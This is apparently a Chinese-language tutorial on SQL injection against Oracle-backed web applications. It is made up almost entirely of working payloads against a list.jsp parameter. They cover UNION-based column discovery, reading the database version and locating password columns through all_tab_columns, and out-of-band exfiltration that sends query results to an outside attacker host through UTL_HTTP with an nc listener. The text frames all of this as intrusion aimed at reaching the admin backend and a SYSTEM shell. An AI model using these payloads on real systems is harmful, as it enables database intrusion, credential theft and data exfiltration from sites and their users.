浅谈 Oracle web环境注射技术

　　list.jsp?username=loveshell' union select NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 用7个NULL来匹配对应的字段不会出现字段类型不一的情况，与mysql不同，后面的select语句必须加一个存在的表，这里是dual。

　　这里正常返回，然后我们就可以继续了，寻找的用做信息反馈的字段需要满足我上面在基本思路里的几个条件。　

list.jsp?username=loveshell' and 1=2 union select 1,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 正常 　　list.jsp?username=loveshell' and 1=2 union select 1,2,NULL,NULL,NULL,NULL,NULL from dual-- 错误，第二个字段不是数字类型 　　list.jsp?username=loveshell' and 1=2 union select 1,'2',NULL,NULL,NULL,NULL,NULL from dual-- 错误，第二个字段不是字符类型

　　这种情况是可能的，因为字段里还包括其他的如日期等类型，这种类型对于我们反馈信息没什么用，所以用NULL直接跳过。

　　list.jsp?username=loveshell' and 1=2 union select 1,NULL,'3',NULL,NULL,NULL,NULL from dual-- 这个时候正常了，而且在页面的对应的位置显示了，这个字段正是我们要找的。有的时候如果想看某个数字是多少怎么办呢?譬如想看记录的条数，直接二分法是可以的，但是直接显示出来还是比较直观，譬如想看dba_tables的记录数　　

list.jsp?username=loveshell' and 1=2 union select 1,to_char((select count(*) from dba_tables),'0000000'),NULL,NULL,NULL,NULL,NULL from dual--

　　当然还有其他to_系列函数，间接实现其他数据库里的自动转换。这个字段在页面显示并且也足够长，放得下我们的数据，所以我们就可以充分利用这个字段来进行查询了，譬如获得系统的版本信息可以用　　

list.jsp?username=loveshell' and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),NULL,NULL,NULL,NULL,NULL from dual--

　　如果不能使用union，也没有关系，只要是oracle数据库，我们一样可以把信息给返回来，不用经典查询那么悲观，首先本地用nc -l -vv -p 9999，然后就可以很简单地用　　

list.jsp?username=loveshell' and UTL_HTTP.request('http://www.loveshell.net:9999/'||(select banner from sys.v_$version where rownum=1))=1--

　　这个时候loveshell.net的9999端口就应该返回sys.v_$version的banner了，就是数据库的版本，我们还获得了数据库所在网络的ip，呵呵，另外还知道数据库是否允许外连等信息。这里使用子查询来获得数据，Oracle没有limit这样的语句所以可以用where rownum=1来返回第一条数据。但是如果想知道其他某一条记录怎么办呢?直接rownum=2是不行的，这里可以再次嵌套一个子查询　　

list.jsp?username=loveshell' and UTL_HTTP.request('http://www.loveshell.net:9999/'||(select data from (select rownum as limit,banner as data from sys.v_$version) where limit =2)=1--

　　这样就可以得到第二条记录了，灵活运用可以很快取得需要的数据。

　　其他的如后台的帐户什么的都可以这样返回来。这种数据的窃取手段适用于update和insert等等一切可以使用函数的地方：)，如果不确信存不存在UTL_HTTP包，可以用语句select count(*) from all_objects where object_name='UTL_HTTP'来判断了，注意，在系统表里的数据是大小写敏感的，但是关键字本身是大小写不敏感的。另外某些少数主机也是没有配置dns或者不能上网，没有配置dns的话可以通过用ip访问的方法来测试，不能上网的就要用其他方法了。

　　能获取数据了，我们继续向web的后台靠拢，如果我们知道了后台的地址但是没有密码，我们就可以通过查询系统表来找找敏感字段如passwd在哪，然后用上面的信息窃取手段给弄回来。all_tables包含了所有的表的信息，想找有包含passwd的字段在哪就可以用all_tab_columns：　　

list.jsp?username=loveshell' and 1=2 union select 1,NULL,(select table_name||chr(35)||column_name from all_tab_columns where column_name like '%25PASS%25' and ROWNUM=1),NULL,NULL,NULL,NULL from dual--

　　其中的%25为%的转码，这样就能获得我们需要的敏感数据了，另外注意在oracle的系统表里数据都是大写的，所以用PASS而不是pass，或者用函数转成小写也可以，如lower(column_name) like '%25pass%25'，进入web后台后可以继续通过后台的功能进行渗透了。

　　刚才说的另外一种思路是直接获得系统的shell，在windows环境下，oracle是以服务的形式启动的，这样通过web注射就可以直接获得system权限，是非常诱人的。我们来看看如何操作吧!首先当然要用到我们上面说到的系统中比较少见的pl/sql注射，另外为了说明在php环境下对注射的处理，我们现在来假设我们的入侵环境是在php+Oracle上面，并且防火墙已经限制了对oracle端口的直接访问，如果是开放的话用网络上的直接添加系统帐户的方法也很容易成功!